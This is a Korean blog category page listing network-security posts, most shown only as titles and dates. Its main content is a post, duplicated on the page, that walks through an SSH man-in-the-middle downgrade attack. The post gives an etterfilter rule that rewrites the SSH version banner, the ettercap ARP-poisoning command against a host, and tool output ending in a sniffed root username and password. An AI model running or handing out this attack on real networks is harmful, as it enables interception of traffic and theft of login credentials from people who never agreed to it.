'네트워크'에 해당되는 글 11건
- 2012.02.07 SiteProtector Address Update Utility
- 2011.01.27 Router Defense
- 2011.01.21 ssh mith with ettercat
- 2010.05.07 무선랜 보안 안내서
- 2009.10.19 네트워크 패킷 분석기
- 2009.07.20 Nmap 5.0
- 2009.06.29 SSH Tunneling 사용하기
- 2009.04.23 Microsoft Network Monitor 3.3
- 2009.03.18 sonicwall vpn configuration
- 2009.03.04 Where can I download a free firewall?
네트워크2012. 2. 7. 17:20
네트워크/네트워크보안2011. 1. 27. 09:18
Router Defense deep dives into Cisco routers and switches configuration
and do security recommandations. It gives the opportunity to audit
network devices in a quick, efficient way and actionable practices. The
author created this tool because he was frustrated of never seeing a
network device with simple security best practices applied in the wild.
링크 : http://code.google.com/p/routerdefense/
네트워크/네트워크보안2011. 1. 21. 10:11
내용
- 서버와 클라이언트 통신 시 ssh 프로토콜 버전 협상이 발생
(Default : SSH-1.99 >> 2버전)
- MITM을 통해 취약한 버전의 SSH 통신토록 설정
SSH v1 VS SSH v2
0x01. 필터링 규칙 생성
# vi ssh_rb.ef
if ( search(DATA.data, "SSH-1.99"))
{
replace("SSH-1.99","SSH-1.51");
}
# etterfilter -o ssh_rb.ef2 ssh_rb.ef
0x02. MITM 시도
# ettercap -T -q -F ssh_rb.ef2 -M ARP /10.0.0.130/ //
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Content filters loaded from ssh_rb.ef2...
Listening on eth0... (Ethernet)
eth0 -> 00:0C:29:BF:9E:AC 10.0.0.134 255.255.255.0
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %
4 hosts added to the hosts list...
ARP poisoning victims:
GROUP 1 : 10.0.0.130 00:0C:29:42:2A:82
GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
SSH : 10.0.0.130:22 -> USER: root PASS: asdfasdf
참고
- http://superuser.egloos.com/3199639
- http://www.irongeek.com/i.php?page=security/ettercapfilter
- 서버와 클라이언트 통신 시 ssh 프로토콜 버전 협상이 발생
(Default : SSH-1.99 >> 2버전)
- MITM을 통해 취약한 버전의 SSH 통신토록 설정
SSH v1 VS SSH v2
0x01. 필터링 규칙 생성
# vi ssh_rb.ef
if ( search(DATA.data, "SSH-1.99"))
{
replace("SSH-1.99","SSH-1.51");
}
# etterfilter -o ssh_rb.ef2 ssh_rb.ef
0x02. MITM 시도
# ettercap -T -q -F ssh_rb.ef2 -M ARP /10.0.0.130/ //
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Content filters loaded from ssh_rb.ef2...
Listening on eth0... (Ethernet)
eth0 -> 00:0C:29:BF:9E:AC 10.0.0.134 255.255.255.0
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %
4 hosts added to the hosts list...
ARP poisoning victims:
GROUP 1 : 10.0.0.130 00:0C:29:42:2A:82
GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
SSH : 10.0.0.130:22 -> USER: root PASS: asdfasdf
참고
- http://superuser.egloos.com/3199639
- http://www.irongeek.com/i.php?page=security/ettercapfilter
네트워크/네트워크보안2010. 5. 7. 11:55
2009. 10. 19. 14:12
보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.
네트워크/네트워크보안2009. 7. 20. 16:35
네트워크/네트워크일반2009. 6. 29. 03:05
네트워크/네트워크일반2009. 4. 23. 20:53
네트워크/방화벽일반2009. 3. 18. 18:10
네트워크/네트워크보안2009. 3. 4. 10:26